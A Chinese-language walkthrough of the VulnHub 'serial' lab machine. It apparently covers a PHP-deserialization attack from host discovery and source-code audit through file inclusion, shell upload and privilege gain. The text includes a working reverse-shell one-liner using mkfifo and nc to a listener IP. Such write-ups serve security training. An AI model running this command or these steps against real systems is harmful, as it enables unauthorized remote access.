反序列化靶机serial复现

靶机描述

今天研究一下php反序列化,靶机serial实战。目标为获取root权限。

-------------------------------------

靶机信息

可以去vulhub上下载此靶机:serial: 1 ~ VulnHub下载好,之后,使用Vmware新建虚拟机打开:

渗透测试过程:

探测主机存活(目标主机IP地址)

使用nmap探测主机存活或者使用Kali里的netdicover进行探测。

扫描到存活主机, 开放了22和80端口

访问web服务

F12查看,是一串base64编码

解码,是一串代码

尝试逻辑绕过,将sk4换成admin,看看是否有什么信息。

这里直接报500错误,没办法,只有找其他思路。

目录扫描

  • 1.使用工具进行扫描,这里扫到一个/backup/目录。

打开查看,是一个zip文件,下载查看,是三个源代码文件

发现三个php文件,打开看是

网站源码

代码审计

user.class.php

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出。

经过代码审计可构造payload,尝试读取passwd文件,payload如下:

成功包含,看到有一个sk4用户可以登录

get shell

构造序列化语句上传shell

然后再次抓包 打开用burp的repeater

成功执行

上传后反弹shell

本地监听端口

开始反弹shell

复制代码
rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>&1|nc+192.168.77.129+5555+>/tmp/f

将上述代码url编码后填入参数位置

监听成功

在攻击模块发送获取shell 查找一个txt.bak文件

查看文件得到密码

最后在远程连接 成功进入

相关推荐
終不似少年遊*19 分钟前
【从基础到模型网络】深度学习-语义分割-基础
网络·人工智能·深度学习·语义分割·卷积·上采样
卡戎-caryon21 分钟前
【Linux网络与网络编程】12.NAT技术&&内网穿透&&代理服务
linux·运维·服务器·网络·网络协议·https
我的老子姓彭22 分钟前
LWIP的Socket接口
运维·服务器·网络
随缘。。。。1 小时前
服务端HttpServletRequest、HttpServletResponse、HttpSession
网络·网络协议·http
Johny_Zhao2 小时前
AI+自动化测试系统方案:网络设备与网络应用智能测试
linux·网络·人工智能·python·网络安全·docker·ai·信息安全·云计算·ansible·shell·cisco·huawei·系统运维·itsm·华三·deepseek
Blossom.1185 小时前
基于区块链技术的供应链溯源系统:重塑信任与透明度
服务器·网络·人工智能·目标检测·机器学习·计算机视觉·区块链
冷崖5 小时前
网络编程-select(二)
网络·学习
AORO_BEIDOU7 小时前
遨游科普:三防平板是什么?有什么功能?
网络·5g·安全·智能手机·电脑·信息与通信
比奥利奥还傲.7 小时前
如何利用内网穿透实现Cursor对私有化部署大模型的跨网络访问实践
网络
tyatyatya8 小时前
MATLAB中进行深度学习网络训练的模型评估步骤
网络·深度学习·matlab